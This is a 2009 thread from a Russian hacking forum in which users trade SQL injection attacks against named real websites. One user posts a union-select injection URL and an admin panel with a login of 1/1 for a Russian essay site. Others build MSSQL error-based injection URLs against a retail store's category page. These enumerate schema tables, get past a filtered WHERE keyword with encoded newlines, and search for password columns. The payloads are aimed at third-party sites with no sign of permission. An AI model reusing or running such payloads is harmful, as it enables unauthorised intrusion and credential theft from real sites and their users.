21.02.2009, 03:05
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
joomler отвлекись ненадолго от компа, и подумай какого ответа ты сдесь ждёшь?
Вот просто , как , по твоему, на твой вопрос можно ответить? Ни сайта, ни даже названия движка ты не привёл, что там в твоей админке никто не знает, скуль? ну разумеется через скуль можно залиться, при соблюдении определённых условий, которые кстати перечислены в обзоре, линк на который ,в свою очередь, тебе давали выше.
Подвязывай заниматься ерундой, и почитай статьи на форуме. И многое станет ясно, а такими вопросами ты себе знаний не добавишь
|
|
|
21.02.2009, 03:35
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
С нами:
9064855
Репутация:
10
|
|
jokester да наверное поторопился, надо почитать сначало на форуме согласен, но хочется то все и сразу)))))
Исправляю ошибки: 1) Что за движек я так и не понял , возможно он самописный
2) Вот сайт и уязвимый скрипт:
http://referats-online.ru/catalog_44.html?pid=44+union+select+1+from+user 3) В админке кроме редактирования статей и новостей больше ни чего нет. http://referats-online.ru/admin
Логин: 1
Пароль: 1
Ну теперь пойду почитаю топики)))
|
|
|
|
21.02.2009, 03:49
|
|
Новичок
Регистрация: 18.02.2009
Сообщений: 6
С нами:
9066019
Репутация:
0
|
|
Я вот нашел такое:
http://devicebondage.stockroom.com/category.aspx?category_id=196'
а что с ним делать?
|
|
|
|
21.02.2009, 08:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
_Zeus_, это mssql-inj. почитай статьи, и попробуй докрутить.
кстати, очень удобная скуля для новичка, я в свое время на такой же тренировался.
Последний раз редактировалось faza02; 21.02.2009 в 09:09..
|
|
|
|
21.02.2009, 09:03
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Никакая это не mysql.
Это MSSQL.
Код:
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=@@version
Читаем это:
http://forum.antichat.ru/thread30501.html
Последний раз редактировалось R1dex; 21.02.2009 в 09:06..
|
|
|
|
21.02.2009, 10:57
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Решил попробовать =) MSSQL
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
Выдает STORE_USER_ASSN
Дальше через Not in но чета не получается, в чем ошибка?
category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--
|
|
|
|
21.02.2009, 15:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Assembler
Решил попробовать =) MSSQL
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
Выдает STORE_USER_ASSN
Дальше через Not in но чета не получается, в чем ошибка?
category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--
фильтруется киворд WHERE
|
|
|
|
21.02.2009, 15:36
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Можно было бы попробывать having но group by и having также фильтруеться.
Последний раз редактировалось AkyHa_MaTaTa; 21.02.2009 в 15:55..
|
|
|
|
21.02.2009, 16:37
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
и подводя итоги:
http://devicebondage.stockroom.com/category.aspx?category_id=196+and+1=(select+top+1+ table_name+from+information_schema.columns%0awhere %0acolumn_name%0alike%0a'%pass%')
|
|
|
|
22.02.2009, 00:34
|
|
Новичок
Регистрация: 18.02.2009
Сообщений: 6
С нами:
9066019
Репутация:
0
|
|
Сообщение от l1ght
и подводя итоги:
Дык, таки не поддаеться. Веб Кнайт. 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
